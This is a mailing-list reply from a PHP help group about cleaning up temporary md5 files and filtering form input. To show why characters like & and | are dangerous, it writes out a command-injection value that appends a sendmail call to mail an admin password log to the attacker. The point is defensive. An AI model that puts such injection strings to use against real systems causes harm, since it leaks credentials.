> I always trust your posts, but don't always understand them, *grin* Me neither ;-P
> A big improvement, but don't know how to do that yet! You will need theese functions: opendir() readdir() filemtime() unlink() closedir() > If I did that in the form, someone aborts, they would get deleted the next > time someone enters. What if one enters the page, generates his md5-file and before he enteres the form another prepares this own md5-file. Are you deleting every existing file? In this case the first person will loose his md5-file. That's why you will need a time based garbage collection. >> Also filter $_POST['code'] for unallowed chars like theese: \ / | > < . : >> & > I didn't understand this. I always use strip_tags, but why are the others > dangerous? > Thanks, Bob. Let's say $code='2342864238724'. This will execute the following shell command: unlink /tmp/2342864238724.semaphore And now somebody get's evil: Let's say $code='2342864238724.semaphore && /usr/root/pass.log > sendmail [EMAIL PROTECTED] --subject="got_it!" "got_it!" && echo' what will happen if you do not filter $code for "evil" chars? unlink /tmp/2342864238724.semaphore && /usr/root/pass.log > sendmail [EMAIL PROTECTED] --subject="got_it!" && echo .semaphore translated: "delete a file and send me the password logfile from the admin" I'm not one of thoose script-children and do not know the shell syntax that good. But something alike can be done! Community email addresses: Post message: [email protected] Subscribe: [EMAIL PROTECTED] Unsubscribe: [EMAIL PROTECTED] List owner: [EMAIL PROTECTED] Shortcut URL to this page: http://groups.yahoo.com/group/php-list Yahoo! Groups Links <*> To visit your group on the web, go to: http://groups.yahoo.com/group/php-list/ <*> To unsubscribe from this group, send an email to: [EMAIL PROTECTED] <*> Your use of Yahoo! Groups is subject to: http://docs.yahoo.com/info/terms/
